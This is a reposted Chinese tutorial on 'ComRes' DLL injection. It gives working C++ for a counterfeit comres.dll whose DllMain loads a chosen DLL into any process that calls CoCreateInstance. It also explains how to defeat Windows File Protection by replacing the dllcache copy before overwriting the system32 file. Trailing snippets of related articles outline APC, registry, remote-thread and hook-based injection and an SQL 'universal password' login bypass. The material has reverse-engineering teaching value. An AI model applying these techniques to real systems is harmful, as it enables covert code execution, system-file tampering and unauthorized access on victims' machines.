[转载]Dll注入技术之ComRes注入

转自:黑客反病毒

DLL注入技术之ComRes注入
    ComRes注入的原理是利用Windows 系统中C:\WINDOWS\system32目录下的ComRes.dll这个文件,当待注入EXE如果使用CoCreateInstance()这个API时,COM服务器会加载ComRes.dll到EXE中,我们利用这个加载过程,移花接木的把ComRes.dll替换掉,并在伪造的ComRes.dll,然后利用LoadLibrary()将事先准备好的DLL加载到目标的EXE中。
1.编写测试文件
    为了向大家完整的演示ComRes注入的过程,我们需要先建立一个使用CoCreateInstance()函数的示例程序。

新建atl的DLL工程,这个工程中只提供了一个简单的com接口方法TestMsgBox,主要代码如下:

  1. STDMETHODIMP CCMyCom::TestMsgBox(void)
  2. {
  3. // TODO: 在此添加实现代码
  4. MessageBox(0,0,0,0);
  5. return S_OK;
  6. }
STDMETHODIMP CCMyCom::TestMsgBox(void)
{
    // TODO: 在此添加实现代码
    MessageBox(0,0,0,0);
    return S_OK;
}

这时编译后会产生一个tlb文件,他是调用com接口方法工程中所要使用的导入文件。新建mfc对话框工程,在stdafx.h文件中加入#import  "tlb文件路径\xxxx.tlb " no_namespace。添加一个BUTTON控件,双击后在单击事件中写入调用atl中com接口方法。主要代码如下:

  1. void CReplaceRescomInjectDlg::OnBnClickedCallcom()
  2. {
  3. // TODO: 在此添加控件通知处理程序代码
  4. CoInitialize(NULL);
  5. CLSID clsid;
  6. HRESULT hr = CLSIDFromProgID(OLESTR("CallComDll.CMyCom"),&clsid);
  7. ICMyCom *ptr;
  8. hr = CoCreateInstance(clsid,NULL,CLSCTX_INPROC_SERVER,
  9. __uuidof(ICMyCom),(LPVOID*)&ptr);
  10. ptr->TestMsgBox();
  11. CoUninitialize();
  12. }
void CReplaceRescomInjectDlg::OnBnClickedCallcom()
{
    // TODO: 在此添加控件通知处理程序代码
    CoInitialize(NULL);
    CLSID clsid;
    HRESULT hr = CLSIDFromProgID(OLESTR("CallComDll.CMyCom"),&clsid);
    ICMyCom *ptr;
    hr = CoCreateInstance(clsid,NULL,CLSCTX_INPROC_SERVER,
        __uuidof(ICMyCom),(LPVOID*)&ptr);
    ptr->TestMsgBox();
    CoUninitialize();
}

2.伪造comres.dll文件
    使用DEPENDS.EXE文件查看一下,发现只有一个导出函数COMResModuleInstance()

新建一个DLL工程,加入def文件,添加导出函数

  1. EXPORTS
  2. COMResModuleInstance
EXPORTS
        COMResModuleInstance

在主工程cpp文件中,加入如下代码

  1. HANDLE ghInst = 0;
  2. BOOL isLoad = FALSE;
  3. BOOL APIENTRY DllMain( HMODULE hModule,
  4. DWORD  ul_reason_for_call,
  5. LPVOID lpReserved
  6. )
  7. {
  8. switch (ul_reason_for_call)
  9. {
  10. case DLL_PROCESS_ATTACH:
  11. ghInst = hModule;
  12. if (!isLoad)
  13. {
  14. LoadLibrary(_T("D:\\MyDll\\ReplaceRescomInject\\Debug\\LoadLibraryDll.dll"));
  15. isLoad = TRUE;
  16. }
  17. break;
  18. case DLL_THREAD_ATTACH:
  19. break;
  20. case DLL_THREAD_DETACH:
  21. break;
  22. case DLL_PROCESS_DETACH:
  23. break;
  24. }
  25. return TRUE;
  26. }
  27. int COMResModuleInstance()
  28. {
  29. return (int)ghInst;
  30. }
HANDLE ghInst = 0;
BOOL isLoad = FALSE;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
        ghInst = hModule;
        if (!isLoad)
        {
            LoadLibrary(_T("D:\\MyDll\\ReplaceRescomInject\\Debug\\LoadLibraryDll.dll"));
            isLoad = TRUE;
        }
        break;
        case DLL_THREAD_ATTACH:
        break;
        case DLL_THREAD_DETACH:
        break;
        case DLL_PROCESS_DETACH:
                break;
        }
        return TRUE;
}

int COMResModuleInstance()
{
    return (int)ghInst;
}

编译后得到的文件改名为comres.dll,然后将其剪切到其他文件夹下备用,这时读者会问,为什么是剪切尓不是拷贝呢?原因在于当在exe同级目录下有和C:\WINDOWS\system32一样的文件,exe会首先加载同级目录下的文件,而不会加载C:\WINDOWS\system32中的文件。

3.替换comres.dll文件
    由于直接拷贝comres.dll文件到C:\WINDOWS\system32目录下会引起winows的文件系统保护机制,所以首先需要将C:\WINDOWS\system32\dllcache下的文件替换掉,然后再将其C:\WINDOWS\system32文件替换为我们伪造的文件。

ComRes注入只需伪造与替换就可以完成,编程要求不高,方便使用,但是由于加载了ComRes.dll后,再想替换ComRes.dll文件就不可能了,因此想反复测试ComRes.dll文件就比较麻烦。

时间: 2024-12-16 06:27:41

[转载]Dll注入技术之ComRes注入的相关文章

[转载]Dll注入技术之APC注入

转自:黑客反病毒 APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断.     2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函数.     3)利用QueueUserAPC()这个API可以在软中断时向线程的APC队列插入一个函数指针,如果我们插入的是L

注入技术--万能密码注入

[实验目的] 1)理解[万能密码]的原理 2)学习[万能密码]的使用 [实验原理] 用户进行用户名和密码验证时,网站需要查询数据库.查询数据库就是执行SQL语句.针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是[Select user_id,user_type,email From usersWhere user_id='用户名' And password='密码'].由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名[admin]和万能密码[2'or'

注入技术--数字型注入

[实验目的] 1)理解SQL注入的原理 2)学习SQL注入的过程 [实验原理] 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,

[转载]Dll注入技术之注册表注入

转自:黑客反病毒论坛 DLL注入技术之REG注入    DLL注入技术指的是将一个DLL文件强行加载到EXE文件中,并成为EXE文件中的一部分,这样做的目的在于方便我们通过这个DLL读写EXE文件内存数据,(例如 HOOK EXE文件中的API),或以被注入EXE的身份去执行一些操作等等.     REG注入原理是利用在Windows 系统中,当REG以下键值中存在有DLL文件路径时,会跟随EXE文件的启动加载这个DLL文件路径中的DLL文件.当如果遇到有多个DLL文件时,需要用逗号或者空格隔开

[转载]Dll注入技术之劫持进程创建注入

转自:黑客反病毒 DLL注入技术之劫持进程创建注入 劫持进程创建注入原理是利用Windows系统中CreateProcess()这个API创建一个进程,并将第6个参数设为CREATE_SUSPENDED,进而创建一个挂起状态的进程,利用这个进程状态进行远程线程注入DLL,然后用ResumeThread()函数恢复进程.1.创建挂起的进程     下面是创建一个挂起的计算器程序进程的主要代码: STARTUPINFO si = {0}; si.cb = sizeof si; si.dwFlags

[转载]Dll注入技术之远程线程注入

转自:黑客反病毒 DLL注入技术之远线程注入 DLL注入技术指的是将一个DLL文件强行加载到EXE文件中,并成为EXE文件中的一部分,这样做的目的在于方便我们通过这个DLL读写EXE文件内存数据,(例如 HOOK EXE文件中的API),或以被注入EXE的身份去执行一些操作等等.     远线程注入原理是利用Windows 系统中CreateRemoteThread()这个API,其中第4个参数是准备运行的线程,我们可以将LoadLibrary()填入其中,这样就可以执行远程进程中的LoadLi

[转载]Dll注入技术之依赖可信进程注入

转自:黑客反病毒 DLL注入技术之依赖可信进程注入 依赖可信进程注入原理是利用Windows 系统中Services.exe这个权限较高的进程,首先将a.dll远线程注入到Services.exe中,再利用a.dll将b.dll远线程注入到待注入进程中.具体过程如下图所示: 这里提供一个小技巧,当注入到Services.exe里的DLL时,想在做完事情后悄无声息的将自己释放掉,在Windows 中有这样的一个API函数FreeLibraryAndExitThread(),它可以把自己卸载掉并且退

[转载]Dll注入技术之消息钩子

转自:黑客反病毒 DLL注入技术之消息钩子注入 消息钩子注入原理是利用Windows 系统中SetWindowsHookEx()这个API,他可以拦截目标进程的消息到指定的DLL中导出的函数,利用这个特性,我们可以将DLL注入到指定进程中.主要流程如下图所示 1.准备阶段     需要编写一个DLL,并且显式导出MyMessageProc()函数,主要代码如下: LRESULT WINAPI MyMessageProc(int code,WPARAM wParam,LPARAM lParam)

<ReversingEngineering>关于windows32位系统下的dll注入技术经验汇

上个学期把自己闷在图书馆一直在看关于逆向工程技术方面的书,从入门到初级,现在也敢说自己一条腿已经迈进了这片知识的大门里,因为该博客刚开通先将一些经验记录下来,也是留给自己一方面做个参照. <逆向工程核心原理>((韩)李承远 )<Reversing:逆向工程揭密(电子工业出版社)><黑客反汇编揭密>((俄)卡巴斯基 ) dll注入技术是一门逆向工程中非常基础非常初步的技术,也是打开大门的钥匙,逆向破解的前提条件.API勾取 ,Rootkit进程隐藏都需要dll注入为先决条